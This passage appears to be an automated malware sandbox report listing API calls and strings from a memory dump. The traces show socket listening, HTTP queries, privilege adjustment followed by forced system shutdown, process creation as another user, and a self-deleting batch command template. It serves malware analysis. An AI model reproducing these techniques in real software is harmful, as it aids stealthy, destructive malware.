APIs

memset.MSVCRT ref: 00CE5774

Part of subcall function 00CEBAD3: memcpy.MSVCRT ref: 00CEBAEE
Part of subcall function 00CEBAD3: StringFromGUID2.OLE32(?), ref: 00CEBB92

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE57BA

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Strings

Software\Microsoft\Yfosteyq, xrefs: 00CE576E 00CE5773 00CE57FB
Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00CE577F

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6E19, Relevance: 7.4, APIs: 4, Instructions: 57

APIs

memcpy.MSVCRT ref: 00CD6E41
memcpy.MSVCRT ref: 00CD6E5E
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00CD6E74
WSASetLastError.WS2_32(0000274C), ref: 00CD6E83

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2BF3, Relevance: 7.4, APIs: 4, Instructions: 54

APIs

Part of subcall function 00CF27C1: socket.WS2_32(?,?,00000006), ref: 00CF27F5

bind.WS2_32(?,00CF2CD1), ref: 00CF2C3A
listen.WS2_32(?,00000014), ref: 00CF2C4F
WSAGetLastError.WS2_32(00000000,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF2C5D

Part of subcall function 00CF2968: shutdown.WS2_32(?,00000002), ref: 00CF2976
Part of subcall function 00CF2968: closesocket.WS2_32(?), ref: 00CF297F
Part of subcall function 00CF2968: WSACloseEvent.WS2_32(?), ref: 00CF2992

WSASetLastError.WS2_32(?,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF2C6D

Part of subcall function 00CF2917: WSACreateEvent.WS2_32(00000000,?,00CF2C15,?,00000000,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF292D
Part of subcall function 00CF2917: WSAEventSelect.WS2_32(?,?,00CF2CD1), ref: 00CF2943
Part of subcall function 00CF2917: WSACloseEvent.WS2_32(?), ref: 00CF2957

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCCBBC, Relevance: 7.3, APIs: 4, Instructions: 139

APIs

Part of subcall function 00CCF1EF: memcmp.MSVCRT ref: 00CCF1FB

Part of subcall function 00CCF20B: memset.MSVCRT ref: 00CCF219
Part of subcall function 00CCF20B: memcpy.MSVCRT ref: 00CCF23A
Part of subcall function 00CCF20B: memcpy.MSVCRT ref: 00CCF260
Part of subcall function 00CCF20B: memcpy.MSVCRT ref: 00CCF284

TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00CCD203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00CCCC39

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00CCD203,?,?,00000000,?), ref: 00CCCCB3
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00CCD203,?,?,00000000,?), ref: 00CCCCD2

Part of subcall function 00CCF0E1: memcmp.MSVCRT ref: 00CCF0FD

LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00CCD203,?,?,00000000), ref: 00CCCD20

Part of subcall function 00CCEEE2: memcpy.MSVCRT ref: 00CCEFC1
Part of subcall function 00CCEEE2: memcpy.MSVCRT ref: 00CCEFE2

Part of subcall function 00CED95F: GetSystemTime.KERNEL32(?), ref: 00CED969

Part of subcall function 00CCEDAE: memcpy.MSVCRT ref: 00CCEDF9

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD258C, Relevance: 7.3, APIs: 4, Instructions: 120

APIs

GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00CD25BA
GetSystemTime.KERNEL32(?), ref: 00CD260D
CharLowerW.USER32(?), ref: 00CD265D
PathRenameExtensionW.SHLWAPI(?,?), ref: 00CD268D

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF4D77, Relevance: 7.3, APIs: 4, Instructions: 111

APIs

Part of subcall function 00CF4B12: EnterCriticalSection.KERNEL32(00D03510,00F51E90,00CF4D87,?,00F51E90), ref: 00CF4B22
Part of subcall function 00CF4B12: LeaveCriticalSection.KERNEL32(00D03510,?,00F51E90), ref: 00CF4B51

Part of subcall function 00CCD2F7: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00CCD315
Part of subcall function 00CCD2F7: VerQueryValueW.VERSION(?,?,?,?), ref: 00CCD382

GetCommandLineW.KERNEL32 ref: 00CF4E01
CommandLineToArgvW.SHELL32 ref: 00CF4E08
LocalFree.KERNEL32 ref: 00CF4E48

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

GetModuleHandleW.KERNEL32(?), ref: 00CF4E8A

Part of subcall function 00CF509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00CF50E0

Part of subcall function 00CD7D68: InitializeCriticalSection.KERNEL32 ref: 00CD7D88

Part of subcall function 00CF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00CF3C98
Part of subcall function 00CF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00CF3CA2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCC5FE, Relevance: 7.3, APIs: 4, Instructions: 104

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00CCD203,?,?,00000000,?,?,?,?,00000000), ref: 00CCC631

Part of subcall function 00CED0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00CED0B5

memcmp.MSVCRT ref: 00CCC67F

Part of subcall function 00CD32C5: memcpy.MSVCRT ref: 00CD32FB
Part of subcall function 00CD32C5: memcpy.MSVCRT ref: 00CD330F
Part of subcall function 00CD32C5: memset.MSVCRT ref: 00CD331D

SetEvent.KERNEL32 ref: 00CCC6C0

Part of subcall function 00CCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00CCD203,?,?,00000000,?), ref: 00CCC6ED

Part of subcall function 00CF1E96: EnterCriticalSection.KERNEL32(?,?,?,?,00CCCAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00CF1E9C
Part of subcall function 00CF1E96: memcmp.MSVCRT ref: 00CF1EC8
Part of subcall function 00CF1E96: memcpy.MSVCRT ref: 00CF1F13
Part of subcall function 00CF1E96: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00CF1F1F

Part of subcall function 00CCCBBC: TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00CCD203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00CCCC39
Part of subcall function 00CCCBBC: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00CCD203,?,?,00000000,?), ref: 00CCCCB3
Part of subcall function 00CCCBBC: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00CCD203,?,?,00000000,?), ref: 00CCCCD2
Part of subcall function 00CCCBBC: LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00CCD203,?,?,00000000), ref: 00CCCD20

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEAF4A, Relevance: 7.3, APIs: 4, Instructions: 91

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00CFF128), ref: 00CEAF7C
DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00CEAF9C

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

Part of subcall function 00CE5C1C: memset.MSVCRT ref: 00CE5C5F

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

Part of subcall function 00CCA150: memcpy.MSVCRT ref: 00CCA18C
Part of subcall function 00CCA150: memcpy.MSVCRT ref: 00CCA1A1
Part of subcall function 00CCA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00CCA1D3
Part of subcall function 00CCA150: memcpy.MSVCRT ref: 00CCA209
Part of subcall function 00CCA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00CCA239
Part of subcall function 00CCA150: memcpy.MSVCRT ref: 00CCA26F
Part of subcall function 00CCA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00CCA29F

memset.MSVCRT ref: 00CEB039
memcpy.MSVCRT ref: 00CEB04B

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD19E0, Relevance: 7.2, APIs: 4, Instructions: 70

APIs

EnterCriticalSection.KERNEL32(00F51E90), ref: 00CD19EE

Part of subcall function 00CD353D: EnterCriticalSection.KERNEL32(00D03510,00F51E90,00CD376F,?,?,?,?,?,00CD191E,?,?,?,?,00CE48EB), ref: 00CD354D
Part of subcall function 00CD353D: LeaveCriticalSection.KERNEL32(00D03510,?,?,?,?,?,00CD191E,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD3575

PathFindFileNameW.SHLWAPI(?), ref: 00CD1A21

Part of subcall function 00CD357D: VirtualProtect.KERNEL32(?,00CD37D4,00000080,?), ref: 00CD35ED
Part of subcall function 00CD357D: GetCurrentThread.KERNEL32 ref: 00CD36AC
Part of subcall function 00CD357D: GetThreadPriority.KERNEL32 ref: 00CD36B5
Part of subcall function 00CD357D: SetThreadPriority.KERNEL32(?,0000000F), ref: 00CD36C6
Part of subcall function 00CD357D: Sleep.KERNEL32(00000000), ref: 00CD36CA
Part of subcall function 00CD357D: memcpy.MSVCRT ref: 00CD36D9
Part of subcall function 00CD357D: FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00CD36EA
Part of subcall function 00CD357D: SetThreadPriority.KERNEL32 ref: 00CD36F2
Part of subcall function 00CD357D: GetTickCount.KERNEL32 ref: 00CD370D
Part of subcall function 00CD357D: GetTickCount.KERNEL32 ref: 00CD371A
Part of subcall function 00CD357D: Sleep.KERNEL32(00000000), ref: 00CD3727
Part of subcall function 00CD357D: VirtualProtect.KERNEL32(?,00CD37D4,00000000,?), ref: 00CD3756

Part of subcall function 00CF509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00CF50E0

LeaveCriticalSection.KERNEL32(00F51E90), ref: 00CD1A9E

Part of subcall function 00CCBC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00CCBC6B

Part of subcall function 00CDBE32: EnterCriticalSection.KERNEL32(00D03510,00F51E90,00CDD8CC,?,00CD1988,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CDBE42
Part of subcall function 00CDBE32: LeaveCriticalSection.KERNEL32(00D03510,?,00CD1988,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CDBE71

PathFindFileNameW.SHLWAPI(?), ref: 00CD1A64

Part of subcall function 00CF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00CF3C98
Part of subcall function 00CF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00CF3CA2

Part of subcall function 00CCDA34: PathFindFileNameW.SHLWAPI(?), ref: 00CCDA53
Part of subcall function 00CCDA34: PathRemoveExtensionW.SHLWAPI(?), ref: 00CCDA7C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9346, Relevance: 7.2, APIs: 4, Instructions: 65

APIs

HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00CD9375
GetLastError.KERNEL32(?,00000000,3D94878D,00000000,3D94878D,00CED67C,?,?,?,?,?,00CC7900,?,?,?), ref: 00CD937B

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

memcpy.MSVCRT ref: 00CD93A6
HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00CD93BF

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CED0DA, Relevance: 7.2, APIs: 4, Instructions: 61

APIs

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

QueryPerformanceCounter.KERNEL32(?), ref: 00CED0F9
GetTickCount.KERNEL32 ref: 00CED106

Part of subcall function 00CCF1A8: EnterCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1B8
Part of subcall function 00CCF1A8: LeaveCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1E2

Part of subcall function 00CC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00CC9ACA
Part of subcall function 00CC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00CC9AEF

memset.MSVCRT ref: 00CED15A
memcpy.MSVCRT ref: 00CED16A

Part of subcall function 00CC9A2A: CryptDestroyHash.ADVAPI32 ref: 00CC9A42
Part of subcall function 00CC9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CC9A53

Part of subcall function 00CC9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00CC9B41

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE4461, Relevance: 7.2, APIs: 4, Instructions: 56

APIs

PathSkipRootW.SHLWAPI(?), ref: 00CE448B
GetFileAttributesW.KERNEL32(?), ref: 00CE44B8
CreateDirectoryW.KERNEL32(?,00000000), ref: 00CE44CC
SetLastError.KERNEL32(00000050), ref: 00CE44EF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCA46D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 51

APIs

memset.MSVCRT ref: 00CCA47C
memset.MSVCRT ref: 00CCA4BF
memset.MSVCRT ref: 00CCA4F5

Strings

8, xrefs: 00CCA4B3

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CFE290, Relevance: 7.2, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CFEC47
UnhandledExceptionFilter.KERNEL32(00CC4D1C), ref: 00CFEC52
GetCurrentProcess.KERNEL32 ref: 00CFEC5D
TerminateProcess.KERNEL32 ref: 00CFEC64

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2155, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133

APIs

Part of subcall function 00CE3EFF: CharLowerW.USER32(?), ref: 00CE3FBA

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

ExitWindowsEx.USER32(00000014,80000000), ref: 00CF228F
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00CF22CF

Part of subcall function 00CD9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD9CCE
Part of subcall function 00CD9C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00CD9D17
Part of subcall function 00CD9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD9D3E
Part of subcall function 00CD9C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00CD9D87
Part of subcall function 00CD9C8D: SetEvent.KERNEL32 ref: 00CD9D9A
Part of subcall function 00CD9C8D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD9DAD
Part of subcall function 00CD9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD9DF1
Part of subcall function 00CD9C8D: CharToOemW.USER32(?,?), ref: 00CD9E6F
Part of subcall function 00CD9C8D: CharToOemW.USER32(?,?), ref: 00CD9E81
Part of subcall function 00CD9C8D: ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00CD9EEC

Part of subcall function 00CE582C: EnterCriticalSection.KERNEL32(00D03510,?,?,?,00CDE9BA), ref: 00CE5842
Part of subcall function 00CE582C: LeaveCriticalSection.KERNEL32(00D03510,?,?,?,00CDE9BA), ref: 00CE5868
Part of subcall function 00CE582C: CreateMutexW.KERNEL32(00D02974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00CE587A

Part of subcall function 00CD2FB7: ReleaseMutex.KERNEL32 ref: 00CD2FBB
Part of subcall function 00CD2FB7: CloseHandle.KERNEL32 ref: 00CD2FC2

ExitWindowsEx.USER32(00000014,80000000), ref: 00CF22E2

Part of subcall function 00CD50C0: GetCurrentThread.KERNEL32 ref: 00CD50D4
Part of subcall function 00CD50C0: OpenThreadToken.ADVAPI32 ref: 00CD50DB
Part of subcall function 00CD50C0: GetCurrentProcess.KERNEL32 ref: 00CD50EB
Part of subcall function 00CD50C0: OpenProcessToken.ADVAPI32 ref: 00CD50F2
Part of subcall function 00CD50C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00CD5113
Part of subcall function 00CD50C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00CD5128
Part of subcall function 00CD50C0: GetLastError.KERNEL32 ref: 00CD5132
Part of subcall function 00CD50C0: CloseHandle.KERNEL32(00000001), ref: 00CD5143

Part of subcall function 00CE407B: memcpy.MSVCRT ref: 00CE409B

Strings

SeShutdownPrivilege, xrefs: 00CF22B1

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF299E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51

APIs

shutdown.WS2_32(?,00000001), ref: 00CF29AC
WSAGetLastError.WS2_32(?,00000001,?,?,?,?,?,?,?,00CEFF4F,?,?,?,00002710,?,?), ref: 00CF29CD
WSASetLastError.WS2_32(00000000,?,00000001), ref: 00CF2A12

Strings

, xrefs: 00CF29F3

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF31E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30

APIs

Part of subcall function 00CF2755: EnterCriticalSection.KERNEL32(00D03510,?,00CF30AF,?,?,00000000), ref: 00CF2765
Part of subcall function 00CF2755: LeaveCriticalSection.KERNEL32(00D03510,?,00000000), ref: 00CF278F

WSAAddressToStringA.WS2_32(?,?,00000000,?,?), ref: 00CF320B
lstrcpyA.KERNEL32(?,0:0,?,00000000,?,?,?,?,?,?,00CF0029,?,?,?,?), ref: 00CF321B

Strings

0, xrefs: 00CF31FD
0:0, xrefs: 00CF3215

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2DBA, Relevance: 6.9, APIs: 2, Strings: 1, Instructions: 63

APIs

WSAGetLastError.WS2_32 ref: 00CF2DF0
WSASetLastError.WS2_32(00002775), ref: 00CF2E54

Strings

, xrefs: 00CF2E18

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD1D27, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

memset.MSVCRT ref: 00CD1DCD

Part of subcall function 00CCF1EF: memcmp.MSVCRT ref: 00CCF1FB

Part of subcall function 00CCF040: memcmp.MSVCRT ref: 00CCF0B6

Part of subcall function 00CCEEA9: memcpy.MSVCRT ref: 00CCEED2

Part of subcall function 00CCEDAE: memcpy.MSVCRT ref: 00CCEDF9

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

memset.MSVCRT ref: 00CD1E71
memcpy.MSVCRT ref: 00CD1E84
memcpy.MSVCRT ref: 00CD1EA6
memcpy.MSVCRT ref: 00CD1EC6

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

Part of subcall function 00CCC907: EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00CCCB5E,?), ref: 00CCC961
Part of subcall function 00CCC907: InterlockedIncrement.KERNEL32 ref: 00CCC99E
Part of subcall function 00CCC907: SetEvent.KERNEL32 ref: 00CCC9BC
Part of subcall function 00CCC907: LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00CCCB5E,?), ref: 00CCC9C9

Part of subcall function 00CCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCE6AF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 47

APIs

GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00CCE6BC
CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00CCE6DC

Part of subcall function 00CCE348: CloseHandle.KERNEL32 ref: 00CCE354

Part of subcall function 00CCE5F1: memcpy.MSVCRT ref: 00CCE632
Part of subcall function 00CCE5F1: memcpy.MSVCRT ref: 00CCE645
Part of subcall function 00CCE5F1: memcpy.MSVCRT ref: 00CCE658
Part of subcall function 00CCE5F1: memcpy.MSVCRT ref: 00CCE663
Part of subcall function 00CCE5F1: GetFileTime.KERNEL32(?,?,?), ref: 00CCE687
Part of subcall function 00CCE5F1: memcpy.MSVCRT ref: 00CCE69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CCE6B2 00CCE6B3 00CCE6B9 00CCE6DB

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD92DF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 46

APIs

memset.MSVCRT ref: 00CD92F2
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00CD9314

Part of subcall function 00CD93E9: SetLastError.KERNEL32(00000008,00003A98,?,00000000,00CD9326,?,?,00000000), ref: 00CD9412
Part of subcall function 00CD93E9: memcpy.MSVCRT ref: 00CD9432
Part of subcall function 00CD93E9: memcpy.MSVCRT ref: 00CD946A
Part of subcall function 00CD93E9: memcpy.MSVCRT ref: 00CD9482

Strings

<, xrefs: 00CD930D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD95BE, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 45

APIs

Part of subcall function 00CF3629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00CF363C
Part of subcall function 00CF3629: GetLastError.KERNEL32(?,00CD5032,?,00000008,?,?,?,?,?,?,00CE49E1,?,?,00000001), ref: 00CF3646
Part of subcall function 00CF3629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00CF366E

EqualSid.ADVAPI32(?,5B867A00), ref: 00CD95E1

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD52FF: LoadLibraryA.KERNEL32(userenv.dll), ref: 00CD530F
Part of subcall function 00CD52FF: GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00CD532D
Part of subcall function 00CD52FF: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00CD5339
Part of subcall function 00CD52FF: memset.MSVCRT ref: 00CD5379
Part of subcall function 00CD52FF: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00CD53C6
Part of subcall function 00CD52FF: CloseHandle.KERNEL32(?), ref: 00CD53DA
Part of subcall function 00CD52FF: CloseHandle.KERNEL32(?), ref: 00CD53E0
Part of subcall function 00CD52FF: FreeLibrary.KERNEL32 ref: 00CD53F4

CloseHandle.KERNEL32(00000001), ref: 00CD9628

Strings

"%s", xrefs: 00CD95F5

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE67C9, Relevance: 6.4, APIs: 5, Instructions: 160

APIs

Part of subcall function 00CCF1A8: EnterCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1B8
Part of subcall function 00CCF1A8: LeaveCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1E2

memcmp.MSVCRT ref: 00CE67F4

Part of subcall function 00CED95F: GetSystemTime.KERNEL32(?), ref: 00CED969

memcmp.MSVCRT ref: 00CE6859

Part of subcall function 00CD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43
Part of subcall function 00CD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

memset.MSVCRT ref: 00CE68ED
memcpy.MSVCRT ref: 00CE691A
memcmp.MSVCRT ref: 00CE6952

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCEE09, Relevance: 6.4, APIs: 4, Instructions: 62

APIs

memset.MSVCRT ref: 00CCEE1C
memcpy.MSVCRT ref: 00CCEE37
memcpy.MSVCRT ref: 00CCEE5F
memcpy.MSVCRT ref: 00CCEE83

Part of subcall function 00CCEDAE: memcpy.MSVCRT ref: 00CCEDF9

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD7DF0, Relevance: 6.4, APIs: 3, Instructions: 56

APIs

EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00CCB9D5,00000003,?,00000000,00000000), ref: 00CD7E07
InterlockedIncrement.KERNEL32(?,?), ref: 00CD7E5B
LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00CCB9D5,00000003,?,00000000,00000000), ref: 00CD7E62

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCF5E9, Relevance: 6.3, APIs: 4, Instructions: 168

APIs

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

Part of subcall function 00CECFF2: memset.MSVCRT ref: 00CED01A

memcpy.MSVCRT ref: 00CCF79E

Part of subcall function 00CED06B: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00CED07B

memcpy.MSVCRT ref: 00CCF719
memcpy.MSVCRT ref: 00CCF731

Part of subcall function 00CED17E: memcpy.MSVCRT ref: 00CED19E
Part of subcall function 00CED17E: memcpy.MSVCRT ref: 00CED1CA

memcpy.MSVCRT ref: 00CCF78D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5AD5, Relevance: 6.3, APIs: 3, Instructions: 10

APIs

